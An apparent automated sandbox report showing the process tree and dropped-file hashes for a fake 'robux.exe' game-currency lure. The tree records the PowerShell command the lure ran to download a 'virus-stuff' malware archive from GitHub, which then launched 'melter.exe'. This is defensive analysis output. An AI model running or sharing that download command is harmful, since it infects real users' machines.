                                                                        2⤵
                                                                          PID:4912
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1
                                                                          2⤵
                                                                            PID:980
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
                                                                            2⤵
                                                                              PID:5756
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
                                                                              2⤵
                                                                                PID:5528
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2200 /prefetch:1
                                                                                2⤵
                                                                                  PID:912
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:1
                                                                                  2⤵
                                                                                    PID:1592
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6068 /prefetch:1
                                                                                    2⤵
                                                                                      PID:6060
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
                                                                                      2⤵
                                                                                        PID:1052
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1756 /prefetch:1
                                                                                        2⤵
                                                                                          PID:216
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
                                                                                          2⤵
                                                                                            PID:3836
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
                                                                                            2⤵
                                                                                              PID:2780
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
                                                                                              2⤵
                                                                                                PID:1888
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:888
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:5532
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7700 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:2160
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7296 /prefetch:8
                                                                                                      2⤵
                                                                                                        PID:4296
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2060,7582909003168957546,12725063099267346271,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7800 /prefetch:8
                                                                                                        2⤵
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:5304
                                                                                                      • C:\Users\Admin\Downloads\robux.exe
                                                                                                        "C:\Users\Admin\Downloads\robux.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5864
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BFD2.tmp\BFD3.tmp\BFD4.bat C:\Users\Admin\Downloads\robux.exe"
                                                                                                          3⤵
                                                                                                            PID:1116
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
                                                                                                              4⤵
                                                                                                              • Blocklisted process makes network request
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1616
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 10 /nobreak
                                                                                                              4⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:3472
                                                                                                            • C:\Windows\system32\timeout.exe
                                                                                                              timeout /t 20 /nobreak
                                                                                                              4⤵
                                                                                                              • Delays execution with timeout.exe
                                                                                                              PID:5924
                                                                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3296
                                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                          1⤵
                                                                                                            PID:800
                                                                                                          • C:\Windows\system32\AUDIODG.EXE
                                                                                                            C:\Windows\system32\AUDIODG.EXE 0x51c 0x50c
                                                                                                            1⤵
                                                                                                              PID:5512
                                                                                                            • C:\Windows\System32\rundll32.exe
                                                                                                              C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                              1⤵
                                                                                                                PID:5268
                                                                                                              • C:\Users\Admin\Downloads\robux2\virus-stuff-main\melter.exe
                                                                                                                "C:\Users\Admin\Downloads\robux2\virus-stuff-main\melter.exe"
                                                                                                                1⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:4528

                                                                                                              Network

                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                              Downloads


                                                                                                                SHA512

                                                                                                                a7c7b03ad1365d9aa1f0b63082ec06e1f3fe6c028d127555344c3f87da74ecd237276db9b4e343f5a5eb647bfd6b99095b7f8d98db552bc0f7a4c70368fbd1bb

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_9A347AC5A42F886F9F966873087C7F2E

                                                                                                                Filesize

                                                                                                                404B

                                                                                                                MD5

                                                                                                                93eb868f4611f77a9ba7644f6b64264a

                                                                                                                SHA1

                                                                                                                4911d4d3aa0146a1909765ec3b347a508aa1936b

                                                                                                                SHA256

                                                                                                                f3ec2888b5d3afb2202a1c1ee69e7f6be8dfca31ece1eebc0abc5acb072b13f3

                                                                                                                SHA512

                                                                                                                1dc0fe7e260bcb49acdfb94c85b1ac8bcfd263bd971a421a26e96921eb969498719d12bdbf3b119b04d42ee3d6eebbaf9ca479a05dac706fdcc362eb93fdae13

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                Filesize

                                                                                                                412B

                                                                                                                MD5

                                                                                                                7bd75f6394b8c5997c89053ce57f8a82

                                                                                                                SHA1

                                                                                                                7edf421beacc8bc2e14e718922a9186cf4ebed7e

                                                                                                                SHA256

                                                                                                                1f6dc8576d5f10dbeba5fbdb6417af295bafd1c057878ba28aa436abdaa2beff

                                                                                                                SHA512

                                                                                                                4536bda7e56cdaf4e1b1437b97aaf467ae4c9ecb6ee6415c7ff4bbdeb2dfb21c94c07dce9033ca9b701f2abc5e6cffe31a6d85d1d2c7f8f1e14712819dedc9dd

                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419

                                                                                                                Filesize

                                                                                                                412B

                                                                                                                MD5

                                                                                                                322eb1e6535d44d81784719bc4cc8741

                                                                                                                SHA1

                                                                                                                4163fdf58a4f56d9bfee4f668fa148290b364c4c

                                                                                                                SHA256

                                                                                                                96ba2ae2d61d4e2f71ce3361c95e9cc309e8ead27eeec05a696a8bf73cc66517

                                                                                                                SHA512

                                                                                                                bb2b020538ba4a643564c45cb5a2066647f844d4dfc62a218d249021174225323fe3afe7351cd2b84ad40e01c906ee175e1bad628b2f9f4b870a3a7a86bb4355

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                9e3fc58a8fb86c93d19e1500b873ef6f

                                                                                                                SHA1

                                                                                                                c6aae5f4e26f5570db5e14bba8d5061867a33b56

                                                                                                                SHA256

                                                                                                                828f4eacac1c40b790fd70dbb6fa6ba03dcc681171d9b2a6579626d27837b1c4

                                                                                                                SHA512

                                                                                                                e5e245b56fa82075e060f468a3224cf2ef43f1b6d87f0351a2102d85c7c897e559be4caeaecfdc4059af29fdc674681b61229319dda95cb2ee649b2eb98d313e

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                Filesize

                                                                                                                152B

                                                                                                                MD5

                                                                                                                27304926d60324abe74d7a4b571c35ea

                                                                                                                SHA1

                                                                                                                78b8f92fcaf4a09eaa786bbe33fd1b0222ef29c1

                                                                                                                SHA256

                                                                                                                7039ad5c2b40f4d97c8c2269f4942be13436d739b2e1f8feb7a0c9f9fdb931de

                                                                                                                SHA512

                                                                                                                f5b6181d3f432238c7365f64fc8a373299e23ba8178bcc419471916ef8b23e909787c7c0617ab22e4eb90909c02bd7b84f1386fbc61e2bdb5a0eb474175da4bd

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000032

                                                                                                                Filesize

                                                                                                                64KB

                                                                                                                MD5

                                                                                                                d6b36c7d4b06f140f860ddc91a4c659c

                                                                                                                SHA1

                                                                                                                ccf16571637b8d3e4c9423688c5bd06167bfb9e9

                                                                                                                SHA256

                                                                                                                34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

                                                                                                                SHA512

                                                                                                                2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000033

                                                                                                                Filesize

                                                                                                                67KB

                                                                                                                MD5

                                                                                                                929b1f88aa0b766609e4ca5b9770dc24

                                                                                                                SHA1

                                                                                                                c1f16f77e4f4aecc80dadd25ea15ed10936cc901

                                                                                                                SHA256

                                                                                                                965eaf004d31e79f7849b404d0b8827323f9fe75b05fe73b1226ccc4deea4074

                                                                                                                SHA512

                                                                                                                fe8d6b94d537ee9cae30de946886bf7893d3755c37dd1662baf1f61e04f47fa66e070210c990c4a956bde70380b7ce11c05ad39f9cbd3ea55b129bb1f573fa07

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000035

                                                                                                                Filesize

                                                                                                                41KB

                                                                                                                MD5

                                                                                                                58756d99d2376dcfbede6057dd25a745

                                                                                                                SHA1

                                                                                                                76f81b96664cd8863210bb03cc75012eaae96320

                                                                                                                SHA256

                                                                                                                f5d0da7b010b28a7fe2c314724a966c44068a8c8fa7e9a495e1284aa501067fa

                                                                                                                SHA512

                                                                                                                476e35c3da0cf223e773c2d26403c12f8c8d034273cca9e3c4cba9359f8506159c2a5267793c8bd9982b636191ddda62e9119593f5599053894c7027a58acc10

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000036

                                                                                                                Filesize

                                                                                                                19KB

                                                                                                                MD5

                                                                                                                76a3f1e9a452564e0f8dce6c0ee111e8

                                                                                                                SHA1

                                                                                                                11c3d925cbc1a52d53584fd8606f8f713aa59114

                                                                                                                SHA256

                                                                                                                381396157ed5e8021dd8e660142b35eb71a63aecd33062a1103ce9c709c7632c

                                                                                                                SHA512

                                                                                                                a1156a907649d6f2c3f7256405d9d5c62a626b8d4cd717fa2f29d2fbe91092a2b3fdd0716f8f31e59708fe12274bc2dea6c9ae6a413ea290e70ddf921fe7f274

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000037

                                                                                                                Filesize

                                                                                                                63KB

                                                                                                                MD5

                                                                                                                710d7637cc7e21b62fd3efe6aba1fd27

                                                                                                                SHA1

                                                                                                                8645d6b137064c7b38e10c736724e17787db6cf3

                                                                                                                SHA256

                                                                                                                c0997474b99524325dfedb5c020436e7ea9f9c9a1a759ed6daf7bdd4890bdc2b

                                                                                                                SHA512

                                                                                                                19aa77bed3c441228789cf8f931ca6194cc8d4bc7bb85d892faf5eaeda67d22c8c3b066f8ceda8169177da95a1fe111bd3436ceeaf4c784bd2bf96617f4d0c44

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000038

                                                                                                                Filesize

                                                                                                                88KB

                                                                                                                MD5

                                                                                                                b38fbbd0b5c8e8b4452b33d6f85df7dc

                                                                                                                SHA1

                                                                                                                386ba241790252df01a6a028b3238de2f995a559

                                                                                                                SHA256

                                                                                                                b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

                                                                                                                SHA512

                                                                                                                546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003a

                                                                                                                Filesize

                                                                                                                1.2MB

                                                                                                                MD5

                                                                                                                ae3e1196fc70529c6e4e126165136f5a

                                                                                                                SHA1

                                                                                                                e482bffe480ac101e7eb97568d67dc8e8a401737

                                                                                                                SHA256

                                                                                                                2fd321b046ad5f14740e970694dbbb14f5c280e1bb3929c966f7231718e4aacd

                                                                                                                SHA512

                                                                                                                e14bed20f1891bb4c581cfbaa164f2e455e4ba798b17ccf8f81a8b3c563a702eb5f8f50525843963b600df3fa8b699155fe1ed9e1aacf16d8568f911e9bc787c

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003b

                                                                                                                Filesize

                                                                                                                43KB

                                                                                                                MD5

                                                                                                                d9b427d32109a7367b92e57dae471874

                                                                                                                SHA1

                                                                                                                ce04c8aeb6d89d0961f65b28a6f4a03381fc9c39

                                                                                                                SHA256

                                                                                                                9b02f8fe6810cacb76fbbcefdb708f590e22b1014dcae2732b43896a7ac060f3

                                                                                                                SHA512

                                                                                                                dcabc4223745b69039ea6a634b2c5922f0a603e5eeb339f42160adc41c33b74911bb5a3daa169cd01c197aeaca09c5e4a34e759b64f552d15f7a45816105fb07

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00003c

                                                                                                                Filesize

                                                                                                                74KB

                                                                                                                MD5

                                                                                                                b07f576446fc2d6b9923828d656cadff

                                                                                                                SHA1

                                                                                                                35b2a39b66c3de60e7ec273bdf5e71a7c1f4b103

                                                                                                                SHA256

                                                                                                                d261915939a3b9c6e9b877d3a71a3783ed5504d3492ef3f64e0cb508fee59496

                                                                                                                SHA512

                                                                                                                7358cbb9ddd472a97240bd43e9cc4f659ff0f24bf7c2b39c608f8d4832da001a95e21764160c8c66efd107c55ff1666a48ecc1ad4a0d72f995c0301325e1b1df

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000041

                                                                                                                Filesize

                                                                                                                25KB

                                                                                                                MD5

                                                                                                                662a8eacbe2122448dac469755a70e37

                                                                                                                SHA1

                                                                                                                d921fb71699a405b09da754a733f672a54ab8bf2

                                                                                                                SHA256

                                                                                                                c8a9584f6a79694cf3f94984f89fc9c86ccbac676a563b821912b95b0ca578f8

                                                                                                                SHA512

                                                                                                                e53f54be9806e3b960e1697275b32c43679492fed694fcb6845f8bc301f5fc135e67473ebc2f6f49e7dd7509ec14a6485ddc6f538f8c76e7aaecafffcbb8776a

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000043

                                                                                                                Filesize

                                                                                                                19KB

                                                                                                                MD5

                                                                                                                d86af39bfad6a7cfc05e8ba5180af40b

                                                                                                                SHA1

                                                                                                                57e8adfdec058824b8b773c43d78c71c247c0002

                                                                                                                SHA256

                                                                                                                9c4ae99d75e4600840647a9549dc2b0004bf2576de44285555b5c2e1e122849a

                                                                                                                SHA512

                                                                                                                00f399d26abaafcd465eba1aec110a86974295eeeec3e547d24b48ec5f2b9c104b7617a842a37d8b18ab6c5ee26c37119df622490322ba0632a968fa0b98c203

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000077

                                                                                                                Filesize

                                                                                                                18KB

                                                                                                                MD5

                                                                                                                69c9b3764321f6066fd8158b77416ec7

                                                                                                                SHA1

                                                                                                                863559d38cb1513ff8c265bf27cfa862cac888ec

                                                                                                                SHA256

                                                                                                                99d8bb61f21823c0a4d8468330a82fcbb7cb3b8f7b02fc95c326a33e122a2f80

                                                                                                                SHA512

                                                                                                                5bb7b93cac20482acb8e54bf8986a309aeeeaefb698701e84bb61a961f25fa67ba1d930f3c49f810090c4cce356e81b34026c8e051b49267be8999d1f73e976c

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                Filesize

                                                                                                                1KB

                                                                                                                MD5

                                                                                                                ce7c91358cdf0ad714d3bd65bd69e9b8

                                                                                                                SHA1

                                                                                                                d770bfb5e76705265d3ce2010d72b4513256e72d

                                                                                                                SHA256

                                                                                                                9f33414d36f2e685cd398f6271d0dec40654bb2215b3041e4c7a3c4ef2ce4e9a

                                                                                                                SHA512

                                                                                                                47b9f976ebc6816ad12a3869243a746e534ea59ebebdbca898c4c1dd4a04fc02a9076c76948117fc6d90798543549a46589c9f1ee4f42d0e09df0115f04befa3

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                5KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                5KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                9KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                5KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                12KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                12KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                12KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                7KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                6KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                9KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                Filesize

                                                                                                                12KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                1KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                2KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                3KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

                                                                                                                Filesize

                                                                                                                4KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe582575.TMP

                                                                                                                Filesize

                                                                                                                540B

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                Filesize

                                                                                                                16B

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\additional_file0.tmp

                                                                                                                Filesize

                                                                                                                1.4MB

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202409132038181\assistant\assistant_installer.exe

                                                                                                                Filesize

                                                                                                                1.8MB

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS42566918\setup.exe

                                                                                                                Filesize

                                                                                                                6.3MB

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Opera_installer_2409132038163015896.dll

                                                                                                                Filesize

                                                                                                                5.8MB

                                                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_trvcpbew.52d.ps1

                                                                                                                Filesize

                                                                                                                60B

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                Filesize

                                                                                                                11KB

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

                                                                                                                Filesize

                                                                                                                10KB

                                                                                                              • C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports\settings.dat

                                                                                                                Filesize

                                                                                                                40B

                                                                                                              • C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports\settings.dat

                                                                                                                Filesize

                                                                                                                40B

